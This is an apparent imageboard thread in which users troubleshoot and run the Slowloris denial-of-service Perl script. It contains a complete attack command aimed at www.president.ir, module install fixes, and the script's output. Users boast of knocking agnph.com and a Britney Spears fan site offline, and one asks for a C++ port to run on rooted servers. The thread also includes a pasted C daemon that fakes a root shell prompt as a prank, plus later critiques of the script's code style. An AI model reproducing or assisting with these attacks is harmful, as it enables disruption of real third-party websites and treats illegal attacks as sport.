Hi Anon, how come I get this:

./slowloris.pl -dns www.president.ir -port 80 -timeout 300 -num 2000 -tcpto 5
Can't locate IO/Socket/SSL.pm in @INC (@INC contains: /etc/perl /usr/local/lib/perl/5.10.0 /usr/local/share/perl/5.10.0 /usr/lib/perl5 /usr/share/perl5 /usr/lib/perl/5.10 /usr/share/perl/5.10 /usr/local/lib/site_perl .) at ./slowloris.pl line 4.
BEGIN failed--compilation aborted at ./slowloris.pl line 4.



??

>>26

perl -MCPAN -e 'install IO::Socket::INET'
perl -MCPAN -e 'install IO::Socket::SSL'

moar infos: http://anonym.to/http://ha.ckers.org/slowloris/

>>27

don't kno what it's doin really but it's workin.
Multithreading enabled.
Connecting to www.president.ir:80 every 300 seconds with 2000 sockets:
Building sockets.
Building sockets.

<snip>
....
....



killed process tho. what nao?

nao you write a c++ version of it, so i can put it on rooted servers withwout recompiling perl.

what it does is pretty simple: it opens 2000 http connections and doesn't close them. for the webserver it's like 2000 people connect to it, and it will deny further connections.

okai question tho, how to use this: inet_pton ??

>>34

http://anonym.to/http://stashbox.org/548697/wot.zip
newb her. it just throws exceptions 2000 times. donno why it won't bind to port.

>>37


WTF AMIDOINITRITE?

>>34
i dun think it would be too hard to put into C, but does anyone know what libarys to use? or any good libarys for networking???

>>40
found this on the web. might be relevant. donno how it works or what the fxns do yet:



#include <stdio.h>
#include <unistd.h>
#include <stdlib.h>
#include <signal.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
int main ( void )
{
pid_t pid;
int sock, send_sock, i;
struct sockaddr_in addr, info;
setsid ( );
umask ( 0 );
signal ( SIGCHLD, SIG_IGN );
if ( fork ( ) ) return 0;
sock = socket ( AF_INET, SOCK_STREAM, 0 );
addr.sin_family = AF_INET;
addr.sin_addr.s_addr = htonl ( INADDR_ANY );
addr.sin_port = htons ( 50 );
bind ( sock, ( struct sockaddr *) &addr, sizeof ( addr ) );
i = sizeof ( info );
listen ( sock, 1 );
for (;;)
{
i = sizeof ( info );
send_sock = accept ( sock, ( struct sockaddr * ) &info, &i );
pid = fork ( );
if ( pid )
{
close ( send_sock );
continue;
}
else
{
send ( send_sock, "sh-2.03# ", 9, 0 );
puts("sending sock");
sleep ( 4 );
send (send_sock, "\nNah, just kidding :P\n", 24, 0);
sleep ( 3 );
close ( send_sock );
return 0;
}
}
return 0;
}

>>42
Nicely played.

But holy shit, this slow loris thing is good! My computer by itself just brought down agnph.com.

this shit is epic
also, 45 get. amirite?

>>43

pic pic pic pic

i can't even bring anything down

>>43
it worked on http://anonym.to/http://britneyspears.ac/ for a little while

what type of script is it?

(USER WAS BANNED FOR THIS POST)

>>304
>#!/usr/bin/perl -w

>>304

I lol'd

can someone tell me how to use it?? im not new to hacking but i've never used more than the most basics of scripts, i still need to learn the languages.

It is not an very interesting exploit. Huge sites won't go down because of this.

Coding style is somewhat incoherent. I don't understand the copy pasting of $primaryload and the creation of sockets in the test function and the domultithreadfunction. Why not make functions of it? Strange nested if statements:

else { if (blabla) { ... } else { } } --- could be simplified to: >>> elsif (blabla) { } else { }
And I hate this:
}
else {

Why would someone do something like this?

And that ugly int(rand(9999999999999999999...

I like to use __DATA__ to keep the code clean of noisy texts. Perl is quite noisy from itself, so it makes it more difficult to follow. It also makes it difficult for your editor to do a decent job at automaticly indentation of your code.

Perl is ugly anyway. I am giving it a try in haskell.

The use of strict and the documentation makes me happy. Probably written by someone in a hurry.